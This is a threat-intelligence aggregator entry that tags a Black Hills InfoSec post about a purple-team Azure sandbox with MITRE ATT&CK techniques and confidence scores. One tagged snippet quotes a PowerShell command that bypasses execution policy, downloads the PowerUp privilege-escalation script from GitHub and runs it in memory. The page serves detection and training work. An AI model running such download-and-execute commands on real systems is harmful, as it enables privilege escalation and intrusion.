TTPwire Vol. 1 · MITRE ATT&CK·Tagged

← All stories

Black Hills InfoSec

The Azure Sandbox – Purple Edition

BHIS · 2022-02-08 · Read original ↗

ATT&CK techniques detected

4 predictions
T1059.001PowerShell
95%
“commands invoke powerup ’ s allchecks. set - executionpolicy bypass - force iex ( new - object net. webclient ). downloadstring ( ' https : / / raw. githubusercontent. com / powershellempire / powertools / master / powerup / powerup. ps1 ' ) invoke - allchecks the next commands s…”
T1059.001PowerShell
52%
“sandbox on azure and run some sketchy powershell commands hunt / defend : learn how to query and create alerts in azure sentinel harden / adjust : future! create playbooks in azure to respond to these alerts accordingly ( there is so much capability here – maybe the next blog ) r…”
T1525Implant Internal Image
51%
“the azure sandbox – purple edition the azure sandbox – purple edition azure has replaced aws in my personal development pipeline. this may sound crazy but hear me out. microsoft has solidified its offerings, done nothing but improve its security posture, and in my opinion, gone a…”
T1526Cloud Service Discovery
35%
“sandbox on azure and run some sketchy powershell commands hunt / defend : learn how to query and create alerts in azure sentinel harden / adjust : future! create playbooks in azure to respond to these alerts accordingly ( there is so much capability here – maybe the next blog ) r…”

Summary

Jordan Drysdale // Azure has replaced AWS in my personal development pipeline. This may sound crazy but hear me out. Microsoft has solidified its offerings, done nothing but improve its […]

The post The Azure Sandbox – Purple Edition  appeared first on Black Hills Information Security, Inc..